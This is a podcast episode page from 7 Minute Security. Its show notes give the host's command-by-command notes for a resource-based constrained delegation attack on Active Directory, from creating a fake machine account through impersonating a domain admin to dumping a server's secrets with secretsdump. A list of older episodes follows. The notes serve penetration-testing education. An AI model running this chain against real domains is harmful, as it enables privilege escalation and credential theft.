7MS #521: Tales of Pentest Pwnage - Part 36
7 Minute Security20 Mai 2022

7MS #521: Tales of Pentest Pwnage - Part 36

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD:

# From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN

Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources.

Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

Episoder(686)

7MS #157: Infosec News and Links Roundup

7MS #157: Infosec News and Links Roundup

Today's show notes are here: https://7ms.us/7ms-157-infosec-news-and-links-roundup/

19 Feb 201611min

7MS #156: OFF-TOPIC - 3 Ways to be a More Connected Parent

7MS #156: OFF-TOPIC - 3 Ways to be a More Connected Parent

Today's show notes: https://7ms.us/7ms-156-off-topic-3-ways-to-be-a-more-connected-parent/

17 Feb 201610min

7MS #155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

7MS #155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

Here are the show notes for today: https://7ms.us/7ms-155-million-dollar-pentest-idea-notepad-tricks-and-ll-bean-jackets-for-dogs/

16 Feb 20169min

7MS #154: Friday Infosec News and Links Roundup

7MS #154: Friday Infosec News and Links Roundup

Episode show notes are here: https://7ms.us/7ms-154-friday-infosec-news-and-links-roundup/.

12 Feb 201613min

7MS #153: OFF-TOPIC - Ex Machina (and special musical guest)

7MS #153: OFF-TOPIC - Ex Machina (and special musical guest)

Today's episode is a movie review of Ex Machina (how the FRICK do you pronounce that?) and closes out with special musical guest, Sweet Surrender!

10 Feb 201611min

7MS #152: Review of the Almond 2015 Wireless Router

7MS #152: Review of the Almond 2015 Wireless Router

This is a mini-review of the Almond 2015 router by Securifi. This is NOT a paid advertisement or endorsement. I just happen to REALLY like this little router.

8 Feb 201610min

7MS #151: Friday Infosec News and Links Roundup

7MS #151: Friday Infosec News and Links Roundup

Here are some of my favorite stories and links for this week! Training opportunities NMAP course from Udemy - $24 for a limited time (I think) How to handle the the thoughtless compliance zombie hordes - by BHIS is coming up Tuesday February 16th from 2-3 ET. The price is free! Pivot Project touts itself as "a portfolio of interesting, practical, enlightening, and often challenging hands-on exercises for people who are trying to improve their mastery of important cybersecurity skills. News It is absurdly easy for attackers to destroy your Web site in 10 minutes. Secure your home network better using advice from the SANS Ouch! newsletter. Chromodo (part of Comodo's Internet Security)disables same-origin policy which basically disables Web security. Wha?! Virus total now looks at firmware images as well. We can soon wave goodbye to Java in the browser forever!. Kinda. Tools Here's a nice SSL/TLS-checking checklist for pentesters. Kali is moving to a rolling release configuration pretty soon. Update yours before April 15!

5 Feb 201611min

7MS #150: OFF-TOPIC-Bone Tomahawk / Goodnight Mommy / Comedy Loves Misery

7MS #150: OFF-TOPIC-Bone Tomahawk / Goodnight Mommy / Comedy Loves Misery

Preview16 wordsIn today's off-topic episode I review the following movies: Bone Tomahawk Goodnight Mommy Misery Loves Comedy

3 Feb 201610min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
aftenpodden-usa
forklart
stopp-verden
popradet
dine-penger-pengeradet
det-store-bildet
bt-dokumentar-2
nokon-ma-ga
unitedno
fotballpodden-2
aftenbla-bla
rss-ness
rss-penger-polser-og-politikk
e24-podden
oppdatert
rss-fredrik-og-zahid-loser-ingenting
liverpoolno-pausepraten
rss-garne-damer